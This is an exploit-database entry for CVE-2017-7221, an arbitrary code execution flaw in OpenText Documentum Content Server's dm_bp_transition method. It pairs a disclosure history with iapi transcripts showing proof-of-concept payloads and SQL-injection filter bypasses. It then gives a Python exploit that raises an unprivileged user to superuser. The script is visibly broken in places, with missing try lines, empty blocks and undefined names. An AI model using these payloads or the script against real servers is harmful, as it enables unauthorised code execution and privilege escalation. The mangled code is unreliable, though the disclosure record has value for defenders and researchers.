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exploitpackAndrey B. PanfilovEXPLOITPACK:4023A919E9FB0AB63EBFE6682BDBFA0D
HistoryApr 25, 2017 - 12:00 a.m.

OpenText Documentum Content Server - dm_bp_transition.ebs docbase Method Arbitrary Code Execution

Andrey B. Panfilov





OpenText Documentum Content Server - dm_bp_transition.ebs docbase Method Arbitrary Code Execution

CVE Identifier: CVE-2017-7221
Vendor: OpenText
Affected products: OpenText Documentum Content Server (all versions)
Researcher: Andrey B. Panfilov
Severity Rating: CVSS v3 Base Score: 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
Fix: not available


all versions of Documentum Content Server contain dm_bp_transition docbase 
method ("stored procedure”) which is written on basic, implementation of this docbase 
methods does not properly validate user input which allows attacker to execute arbitrary 
code with superuser privileges.

Related code snippet is:


'Evaluate the user-defined entry criteria
If (result = True And run_entry = "T") Then
If (debug = True) Then
PrintToLog sess, "Run user defined entry criteria."
End If
' researcher comment:
' userEntryID parameter is controlled by attacker
result = RunProcedure(userEntryID, 1, sess, sysID,_
user_name, targetState)
End If


' researcher comment:
' procID parameter is controlled by attacker

Function RunProcedure(procID As String, procNo As Integer,_
sessID As String, objID As String, userName As String,_
targetState As String) As Boolean


If (procID <> "0000000000000000") Then
result = CheckStatus("", 1, "loading procedure " & procID, True, errorMsg)
' researcher comment:
' here basic interpreter loads content of user-provided script
' from underlying repostiory using following technique:
' checking that it is dealing with dm_procedure object
' (check was introduced in CVE-2014-2513):
' id,c,dm_procedure where r_object_id='procID'
' getting content of basic script
' fetch,c,procID
' getpath,c,l

result = external(procID)
If (result = True) Then
If (procNo = 1) Then
' --- Running user-defined entry criteria ---
result = CheckStatus("", 1, "Running EntryCriteria", True, errorMsg)
On Error Goto NoFunction
' researcher comment
' here dmbasic interpreter executes user defined function
result = EntryCriteria(sessID, objID, userName,_
targetState, errorStack)
If (result = False) Then
errorStack = "[ErrorCode] 1500 [ServerError] " + _
End If


So, attacker is able to create it’s own basic procedure in repository and pass it’s identifier
as argument for dm_bp_transition procedure:

$ cat /tmp/test
cat: /tmp/test: No such file or directory
$ cat > test.ebs
Public Function EntryCriteria(ByVal SessionId As String,_
ByVal ObjectId As String,_
ByVal UserName As String,_
ByVal TargetState As String,_
ByRef ErrorString As String) As Boolean
t = ShellSync("echo dm_bp_transition_has_vulnerability > /tmp/test")
End Function
$ iapi
Please enter a docbase name (docubase): repo
Please enter a user (dmadmin): unprivileged_user
Please enter password for unprivileged_user:

EMC Documentum iapi - Interactive API interface
(c) Copyright EMC Corp., 1992 - 2011
All rights reserved.
Client Library Release 6.7.1000.0027

Connecting to Server using docbase repo
[DM_SESSION_I_SESSION_START]info: "Session 0101d920800b1a37
started for user unprivileged_user."

Connected to Documentum Server running Release 6.7.1090.0170 Linux.Oracle
Session id is s0
API> create,c,dm_procedure
API> set,c,l,object_name
SET> test
API> setfile,c,l,test.ebs,crtext
API> save,c,l
API> ?,c,execute do_method with method='dm_bp_transition',
arguments='repo repo dmadmin "" 0000000000000000 0000000000000000
0000000000000000 0801d920804e5416 0000000000000000 0000000000000000
0000000000000000 "" 0 0 T F T T dmadmin 0000000000000000'
(1 row affected)

API> Bye
$ cat /tmp/test


Vendor was been notified about this vulnerability on November 2013 using customer 
support channel, after a while vendor started claiming that this vulnerability 
was remediated, though no CVE was announced. Moreover, the fix was contested
and CERT/CC started tracking this vulnerability, the PoC provided
to CERT/CC was:

Vendor have decided that the root cause of problem is users are able to
create dm_procedure objects, and now in Documentum Content Server
v6.7SP1P26 we have following behavior:

[DM_SESSION_I_SESSION_START]info: "Session 0101d920800f0174 started for
user unprivileged_user."

Connected to Documentum Server running Release 6.7.1260.0322 Linux.Oracle
Session id is s0
API> create,c,dm_procedure
API> set,c,l,object_name
SET> test
API> setfile,c,l,test.ebs,crtext
API> save,c,l
[DM_USER_E_NEED_SU_OR_SYS_PRIV]error: "The current user
(unprivileged_user) needs to have superuser or sysadmin privilege."


API> create,c,dm_document
API> set,c,l,object_name
SET> test
API> setfile,c,l,test.ebs,crtext
API> save,c,l

API> ?,c,execute do_method with
method='dm_bp_transition',arguments='repo repo dmadmin ""
0000000000000000 0000000000000000 0000000000000000 0901d920805929dd
0000000000000000 0000000000000000 0000000000000000 "" 0 0 T F T T
dmadmin 0000000000000000'
(1 row affected)


API> Bye
~]$ cat /tmp/test


On July 2014 vendor announced ESA-2014-064 which was claiming that vulnerability has been remediated.

On November 2014 fix was contested (there was significant delay after ESA-2014-064 because vendor 
constantly fails to provide status of reported vulnerabilities) by providing another proof of concept, 
description provided to CERT/CC was:

I have tried to reproduce PoC, described in VRF#HUFPRMOP, and got following

[ErrorCode] 1000 [Parameter] 0801fd08805c9dfe [ServerError] Unexpected
error: [DM_API_W_NO_MATCH]warning: "There was no match in the
docbase for the qualification: dm_procedure where r_object_id =

Such behaviour means that EMC tried to remediate a security issue by
"checking" object type of supplied object:

Connected to Documentum Server running Release 6.7.2190.0198 Linux.Oracle
Session id is s0
API> id,c,dm_procedure where r_object_id = '0801fd08805c9dfe'
[DM_API_W_NO_MATCH]warning: "There was no match in the docbase for the
qualification: dm_procedure where r_object_id = '0801fd08805c9dfe'"

API> Bye

bin]$ strings dmbasic| grep dm_procedure
id,%s,dm_procedure where object_name = '%s' and folder('%s')
id,%s,dm_procedure where r_object_id = '%s'
# old version of dmbasic binary
bin]$ strings dmbasic| grep dm_procedure

So, the fix was implemented in dmbasic binary, the problem is neither 6.7
SP2 P15 nor 6.7 SP1 P28 patches contain dmbasic binary - the first patch
that was shipped with dmbasic binary was 6.7SP2 P17. Moreover, the
issue is still reproducible because introduced check could be bypassed
using SQL injection:

~]$ cat test.ebs
Public Function EntryCriteria(ByVal SessionId As String,_
ByVal ObjectId As String,_
ByVal UserName As String,_
ByVal TargetState As String,_
ByRef ErrorString As String) As Boolean
t = ShellSync("echo dm_bp_transition_has_vulnerability > /tmp/test")
End Function
~]$ cat /tmp/test
cat: /tmp/test: No such file or directory

~]$ iapi
Please enter a docbase name (docubase): repo
Please enter a user (dmadmin): test01
Please enter password for test01:

EMC Documentum iapi - Interactive API interface
(c) Copyright EMC Corp., 1992 - 2011
All rights reserved.
Client Library Release 6.7.2190.0142

Connecting to Server using docbase repo
[DM_SESSION_I_SESSION_START]info: "Session 0101fd088014000c started for
user test01."

Connected to Documentum Server running Release 6.7.2190.0198 Linux.Oracle
Session id is s0
API> create,c,dm_sysobject
API> set,c,l,object_name
SET> test
API> setfile,c,l,test.ebs,crtext
API> save,c,l
API> ?,c,execute do_method WITH METHOD='dm_bp_transition', ARGUMENTS='
repo repo dmadmin "" 0000000000000000 0000000000000000
0000000000000000 "0801fd08805c9dfe,'' union select r_object_id
from dm_sysobject where r_object_id=''0801fd08805c9dfe"
0000000000000000 0000000000000000 0000000000000000 ""
0 0 T F T T dmadmin 0000000000000000'


(1 row affected)

API> Bye
~]$ cat /tmp/test

Here "union ..." allows to bypass check based on "id" call:

Connected to Documentum Server running Release 6.7.2190.0198 Linux.Oracle
Session id is s0
API> id,c,dm_procedure where r_object_id='0801fd08805c9dfe,' union
select r_object_id from dm_sysobject where
API> apply,c,,GET_LAST_SQL
API> next,c,q0
API> get,c,q0,result

select all dm_procedure.r_object_id from dm_procedure_sp dm_procedure where
((dm_procedure.r_object_id='0801fd08805c9dfe,')) and
(dm_procedure.i_has_folder = 1 and dm_procedure.i_is_deleted = 0)
union select all dm_sysobject.r_object_id from dm_sysobject_sp
dm_sysobject where ((dm_sysobject.r_object_id= '0801fd08805c9dfe'))
and (dm_sysobject.i_has_folder = 1 and dm_sysobject.i_is_deleted = 0)

API> close,c,q0

Comma is required to bypass error in fetch call:
API> fetch,c,0801fd08805c9dfe' union select r_object_id from
dm_sysobject where r_object_id='0801fd08805c9dfe
[DM_API_E_BADID]error: "Bad ID given: 0801fd08805c9dfe' union
select r_object_id from dm_sysobject where r_object_id=

API> fetch,c,0801fd08805c9dfe,' union select r_object_id from
dm_sysobject where r_object_id='0801fd08805c9dfe

On August 2015 vendor had undertaken another attempt to remediate this vulnerability
check ESA-2015-131/CVE-2015-4533 for details.

On August 2015 the fix was contested, check
for detailed description - I just demonstrated another attack vector - using 
UNION ALL keyword instead of UNION:

API> ?,c,execute do_method WITH METHOD='dm_bp_transition', ARGUMENTS='
repo repo dmadmin "" 0000000000000000 0000000000000000
0000000000000000 "0801fd08805c9dfe,'' union select r_object_id
from dm_sysobject where r_object_id=''0801fd08805c9dfe"
0000000000000000 0000000000000000 0000000000000000 ""
0 0 T F T T dmadmin 0000000000000000'

"The arguments being passed to the method 'dm_bp_transition' are
arguments contain sql keywords which are not allowed."

New attack vector (note ALL keyword):

API> ?,c,execute do_method WITH METHOD='dm_bp_transition', ARGUMENTS='
repo repo dmadmin "" 0000000000000000 0000000000000000
0000000000000000 "0801fd08805c9dfe,'' union all select r_object_id
from dm_sysobject where r_object_id=''0801fd08805c9dfe"
0000000000000000 0000000000000000 0000000000000000 ""
0 0 T F T T dmadmin 0000000000000000'


Recently I have noticed that latest versions of Documentum Content
Server are not affected by the PoC provided above, however all versions
of Documentum Content Server are still vulnerable because vendor incorrectly
implemented input validation: they convert arguments to lower/upper-case, 
replace line feed, carriage return and tab characters by a space, 
remove double spaces, after that they check where resulting string contains 
special keywords ('union ' and 'union all') or not - it is possible 
to use other whitespace characters like backspace, which is demonstrated
in the PoC.      


Andrey B. Panfilov

#!/usr/bin/env python

import socket
import sys
from os.path import basename

from dctmpy.docbaseclient import DocbaseClient
from dctmpy.obj.typedobject import TypedObject


def usage():
    print "usage:\n\t%s host port user password" % basename(sys.argv[0])

def main():
    if len(sys.argv) != 5:

    (session, docbase) = create_session(*sys.argv[1:5])

    if is_super_user(session):
        print "Current user is a superuser, nothing to do"

    install_owner = session.serverconfig['r_install_owner']
    document_id = session.next_id(0x08)
    content_id = session.next_id(0x06)

    store = session.get_by_qualification("dm_store")
    format = session.get_by_qualification("dm_format where name='crtext'")
    handle = session.make_pusher(store['r_object_id'])
    if handle < 1:
        print "Unable to create pusher"

    data = "Public Function EntryCriteria(ByVal SessionId As String,_" \
           "\nByVal ObjectId As String,_" \
           "\nByVal UserName As String,_" \
           "\nByVal TargetState As String,_" \
           "\nByRef ErrorString As String) As Boolean" \
           "\nDim QueryID As String" \
           "\nDim Query As String" \
           "\nQuery = \"query,c,update dm_user objects set " \
           "user_privileges=16 where user_name=\'%s\'\"" \
           "\nQueryID = dmAPIGet(Query)" \
           "\nQueryID = dmAPIExec(\"commit,c\")" \
           "\nEntryCriteria=True" \
           "\nEnd Function" % (sys.argv[3])

    b = bytearray()

    if not session.start_push(handle, content_id, format['r_object_id'], len(b)):
        print "Failed to start push"

    session.upload(handle, b)
    data_ticket = session.end_push_v2(handle)['DATA_TICKET']

    procedure = False
        print "Trying to create dm_procedure"
        document = TypedObject(session=session)
        document.set_string("OBJECT_TYPE", "dm_procedure")
        document.set_bool("IS_NEW_OBJECT", True)
        document.set_int("i_vstamp", 0)
        document.set_int("world_permit", 7)
        document.set_string("object_name", "CVE-2014-2513")
        document.set_string("r_object_type", "dm_procedure")
        document.append_id("i_contents_id", content_id)
        document.set_int("r_page_cnt", 1)
        document.set_string("a_content_type", format['name'])
        document.set_bool("i_has_folder", True)
        document.set_bool("i_latest_flag", True)
        document.set_id("i_chronicle_id", document_id)
        document.append_string("r_version_label", ["1.0", "CURRENT"])
        document.set_int("r_content_size", len(b))
        if session.sys_obj_save(document_id, document):
            procedure = True
    except Exception, e:
        print str(e)

    if not procedure:
        print "Failed to create dm_procedure"
        print "Trying to create dm_sysobject"
        document = TypedObject(session=session)
        document.set_string("OBJECT_TYPE", "dm_sysobject")
        document.set_bool("IS_NEW_OBJECT", True)
        document.set_int("i_vstamp", 0)
        document.set_string("owner_name", sys.argv[3])
        document.set_int("world_permit", 7)
        document.set_string("object_name", "CVE-2017-7221")
        document.set_string("r_object_type", "dm_sysobject")
        document.append_id("i_contents_id", content_id)
        document.set_int("r_page_cnt", 1)
        document.set_string("a_content_type", format['name'])
        document.set_bool("i_has_folder", True)
        document.set_bool("i_latest_flag", True)
        document.set_id("i_chronicle_id", document_id)
        document.append_string("r_version_label", ["1.0", "CURRENT"])
        document.set_int("r_content_size", len(b))
        if not session.sys_obj_save(document_id, document):
            print "Failed to create dm_sysobject"

    content = TypedObject(session=session)
    content.set_string("OBJECT_TYPE", "dmr_content")
    content.set_bool("IS_NEW_OBJECT", True)
    content.set_id("storage_id", store['r_object_id'])
    content.set_id("format", format['r_object_id'])
    content.set_int("data_ticket", data_ticket)
    content.set_id("parent_id", document_id)
    content.set_int("page", 0)
    content.set_string("full_format", format['name'])
    content.set_int("content_size", len(b))
    if not session.save_cont_attrs(content_id, content):
        print "Failed to create content"

    if procedure:
        query = "execute do_method WITH METHOD='dm_bp_transition'," \
                " ARGUMENTS='%s %s %s \"\" 0000000000000000 " \
                "0000000000000000 0000000000000000 \"%s\" " \
                "0000000000000000  0000000000000000 0000000000000000 " \
                "\"\" 0 0 T F T T %s %s'" % \
                (docbase, docbase, install_owner, document_id,
                 install_owner, session.session)
        query = "execute do_method WITH METHOD='dm_bp_transition'," \
                " ARGUMENTS='%s %s %s \"\" 0000000000000000 " \
                "0000000000000000 0000000000000000 \"%s,'' " \
                "union\b select r_object_id from  dm_sysobject(all) where r_object_id=''%s\" " \
                "0000000000000000  0000000000000000 0000000000000000 " \
                "\"\" 0 0 T F T T %s %s'" % \
                (docbase, docbase, install_owner, document_id,
                 document_id, install_owner, session.session)


    r = session.query(
        "select user_privileges from dm_user "
        "where user_name=USER") \
    if r != 16:
        print "Failed"
    print "P0wned!"

def create_session(host, port, user, pwd, identity=None):
    print "Trying to connect to %s:%s as %s ..." % \
          (host, port, user)
    session = None
        session = DocbaseClient(
            host=host, port=int(port),
            username=user, password=pwd,
    except socket.error, e:
        if e.errno == 54:
            session = DocbaseClient(
                host=host, port=int(port),
                username=user, password=pwd,
                secure=True, ciphers=CIPHERS)
            raise e
    docbase = session.docbaseconfig['object_name']
    version = session.serverconfig['r_server_version']
    print "Connected to %s:%s, docbase: %s, version: %s" % \
          (host, port, docbase, version)
    return (session, docbase)

def is_super_user(session):
    user = session.get_by_qualification(
        "dm_user WHERE user_name=USER")
    if user['user_privileges'] == 16:
        return True
    group = session.get_by_qualification(
        "dm_group where group_name='dm_superusers' "
        "AND any i_all_users_names=USER")
    if group is not None:
        return True

    return False

if __name__ == '__main__':





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